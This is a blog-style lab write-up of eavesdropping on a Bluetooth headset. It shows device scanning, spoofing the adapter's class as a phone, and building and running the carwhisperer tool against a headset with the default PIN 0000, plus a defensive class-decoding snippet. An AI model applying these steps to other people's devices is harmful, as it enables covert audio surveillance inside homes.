Nuclear'Atk (核攻击) Network Security Lab
Physical hacking: a small experiment in eavesdropping on a Bluetooth headset (mobile Bluetooth headset intrusion, remote audio eavesdropping)
A small experiment in eavesdropping on a Bluetooth headset
mramydnei | 2015-10-19 22:41
Last week I read Hirsch-Bluetooth-Device-Security-2015 and found this passage quite interesting:
Scenarios (5) Example #4: all Bluetooth speakers or headsets that are auto-discoverable with HSP (headset) service (most have this)
● Eve walks down street listening for auto-discoverable HSP devices (these are common!)
● Eve notes that many well-to-do neighborhoods have lots of these HSP devices left on 24/7, and that Eve can pair remotely without local confirmation, and listen to everything in the home the microphone can pick up.
So I bought a Bluetooth headset online to try it out.
Product name: ELECOM HS10
Supported profiles: HFP/HSP
Radio: Bluetooth 3.0
Then I started RTFM. I found that the default PIN is 0000 and that holding the operation button for 5 s puts the headset into pairing mode. After holding the button for 5 s as the manual describes to enter pairing mode, I scanned for Bluetooth devices from the PC:
root@kali:~# hcitool scan
Scanning ...
	28:52:E0:XX:XX:XX	HS10
With the headset's Bluetooth address in hand, change the adapter's device class so the PC presents itself as a phone:
service bluetooth restart
hciconfig hci0 up
hciconfig hci0 class 0x500204
Confirm that the change took effect:
root@kali:~/carwhisperer-0.2# hciconfig -a
hci0:	Type: BR/EDR  Bus: USB
	BD Address: A8:86:DD:XX:XX:XX  ACL MTU: 1021:8  SCO MTU: 64:1
	UP RUNNING
	RX bytes:508634 acl:119 sco:9598 events:755 errors:0
	TX bytes:212355 acl:132 sco:9486 commands:371 errors:0
	Features: 0xbf 0xfe 0xcf 0xfe 0xdb 0xff 0x7b 0x87
	Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
	Link policy: RSWITCH SNIFF
	Link mode: SLAVE ACCEPT
	Name: 'kali'
	Class: 0x500204
	Service Classes: Object Transfer, Telephony
	Device Class: Phone, Cellular
	HCI Version: 4.0 (0x6)  Revision: 0x22fc
	LMP Version: 4.0 (0x6)  Subversion: 0x416a
	Manufacturer: Broadcom Corporation (15)
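The Class of Device value 0x500204 set above is why hciconfig reports "Object Transfer, Telephony" and "Phone, Cellular". As an added example (not part of the original post), this decoder unpacks the 24-bit CoD field into its major class, minor class and service-class bits; the headset-style value 0x240404 is a constructed comparison value. The point for defenders is that CoD is a self-declared, unauthenticated field: a headset that accepts any "phone" with PIN 0000 is trusting a label, not an identity.

```python
# Added example (not from the original post): decode a Bluetooth Class of
# Device (CoD) value such as the 0x500204 the post sets with hciconfig.
# CoD layout (24 bits): bits 0-1 format type, bits 2-7 minor device class
# (meaning depends on the major class), bits 8-12 major device class,
# bits 13-23 service classes. The device advertises it; nothing checks it.

SERVICE_CLASS_BITS = {
    13: "Limited Discoverable Mode", 16: "Positioning", 17: "Networking",
    18: "Rendering", 19: "Capturing", 20: "Object Transfer",
    21: "Audio", 22: "Telephony", 23: "Information",
}

MAJOR_CLASSES = {
    0: "Miscellaneous", 1: "Computer", 2: "Phone", 3: "LAN/Network Access Point",
    4: "Audio/Video", 5: "Peripheral", 6: "Imaging", 7: "Wearable",
    8: "Toy", 9: "Health", 31: "Uncategorized",
}

# Minor classes only for the two majors relevant here: Phone and Audio/Video.
MINOR_CLASSES = {
    2: {0: "Uncategorized", 1: "Cellular", 2: "Cordless", 3: "Smartphone",
        4: "Wired modem or voice gateway", 5: "Common ISDN Access"},
    4: {0: "Uncategorized", 1: "Wearable Headset Device", 2: "Hands-free Device",
        4: "Microphone", 5: "Loudspeaker", 6: "Headphones", 7: "Portable Audio",
        8: "Car audio"},
}


def decode_cod(cod):
    """Return (major, minor, [service classes]) for a 24-bit CoD value."""
    if cod < 0 or cod > 0xFFFFFF or cod & 0x3 != 0:
        raise ValueError("unsupported CoD format: %#x" % cod)
    minor_code = (cod >> 2) & 0x3F
    major_code = (cod >> 8) & 0x1F
    major = MAJOR_CLASSES.get(major_code, "Reserved (%d)" % major_code)
    minor = MINOR_CLASSES.get(major_code, {}).get(minor_code, "minor %d" % minor_code)
    services = [name for bit, name in sorted(SERVICE_CLASS_BITS.items())
                if (cod >> bit) & 1]
    return major, minor, services


if __name__ == "__main__":
    # 0x500204 is the value the post sets; 0x240404 is a constructed
    # headset-style value (Audio/Video, Wearable Headset, Rendering+Audio).
    for value in (0x500204, 0x240404):
        major, minor, services = decode_cod(value)
        print("%#08x -> %s / %s, services: %s" % (value, major, minor, ", ".join(services)))
```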
Download carwhisperer-0.2 from here and extract it:
http://trifinite.org/Downloads/carwhisperer-0.2.tar.gz
Run make, then fix the two pitfalls in the Makefile: replace cw_pin.sh with cw_pin.pl, save and exit, and run make install to finish the installation.
Then, using the Bluetooth address obtained earlier, start eavesdropping on the target headset:
root@kali:~/carwhisperer-0.2# carwhisperer hci0 message.raw justatest00.raw...